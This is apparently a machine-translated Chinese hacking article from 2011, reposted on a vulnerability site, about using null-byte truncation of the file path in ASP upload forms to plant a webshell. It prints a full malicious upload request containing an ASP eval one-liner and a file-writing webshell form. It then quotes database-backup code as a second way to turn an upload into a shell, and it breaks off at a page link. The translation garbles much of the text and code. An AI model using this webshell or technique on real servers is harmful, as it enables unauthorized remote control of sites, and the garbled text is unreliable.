Upload vulnerability filepath variable\0 0 truncation-vulnerabilities and early warning-the black bar safety net

2011-10-26T00:00:00
ID MYHACK58:62201132148
Type myhack58
Reporter 佚名
Modified 2011-10-26T00:00:00

Description

POST /coin/upload. asp? action=upfile HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, /

Referer:

Recently phpwind contains a vulnerability that Diamondback always wanted to use local contains to get a shell, they discovered that the magic quotes to off in the case,%0 0 may be truncated, so any configuration we desired variable but today our topic of discussion is not this but a very classic upload\0 0 truncate the filepath, the control file suffix.

Here is an upload after the package:

upload/2010/2/201002232155064073.gif

-----------------------------7d9138191ce08bc

Content-Disposition: form-data; name="valcode"

6 9 1 8

-----------------------------7d9138191ce08bc

Content-Disposition: form-data; name="file_name1"; filename="D:\hacker\xiaoma.gif"

Content-Type: text/plain

<%eval request("#")%>

<%on error resume next%>

<%ofso="scripting. filesystemobject"%>

<%set fso=server. createobject(ofso)%>

<%path=request("path")%>

<%if path<>"" then%>

<%data=request("dama")%>

<%set dama=fso. createtextfile(path,true)%>

<%dama. write data%>

<%if err=0 then%>

<%="success"%>

<%else%>

<%="false"%>

<%end if%>

<%err. clear%>

<%end if%>

<%dama. close%>

<%set dama=nothing%>

<%set fos=nothing%>

<%="<form action=" method=post>"%>

<%="<input type=text name=path>"%>

<%="<br>"%>

<%=server. mappath(request. servervariables("script_name"))%>

<%="<br>"%>

<%=""%>

<%="<textarea name=dama cols=7 0 rows=3 0 width=3 0></textarea>"%>

<%="<br>"%>

<%="<input type=submit value=save>"%>

<%="</form>"%>

-----------------------------7d9138191ce08bc

Content-Disposition: form-data; name="submit"

Upload

-----------------------------7d9138191ce08bc--

If nothing else, we can upload to get our webshell.

We in practice, often encounter a class of the background, there is a backup, but the backup of the end of the file he gave you one. mdb, such as subordinates this code

sub backupdata()

Dbpath=request. form("Dbpath")

Dbpath=server. mappath(Dbpath)

bkfolder=request. form("bkfolder")

bkdbname=request. form("bkdbname")

Set Fso=server. createobject("scripting. filesystemobject")

if fso. fileexists(dbpath) then

If CheckDir(bkfolder) = True Then

response. write bkfolder& "\"& amp; bkdbname & ". mdb" 'in order to look good, and I gave him the print out

fso. copyfile dbpath,bkfolder& "\"& amp; bkdbname & ". mdb"

else

MakeNewsDir bkfolder

fso. copyfile dbpath,bkfolder& "\"& amp; bkdbname & ". mdb"

end if

response. write "database backup is complete, do the other operation! To establish the use of FTP tools to backup databases to ensure data security"

else

response. write "can't find your needed backup files!"

end if

end sub

Function CheckDir(FolderPath)

folderpath=Server. MapPath(".")& amp;"\"&folderpath

Set fso1 = CreateObject("Scripting. FileSystemObject")

[1] [2] next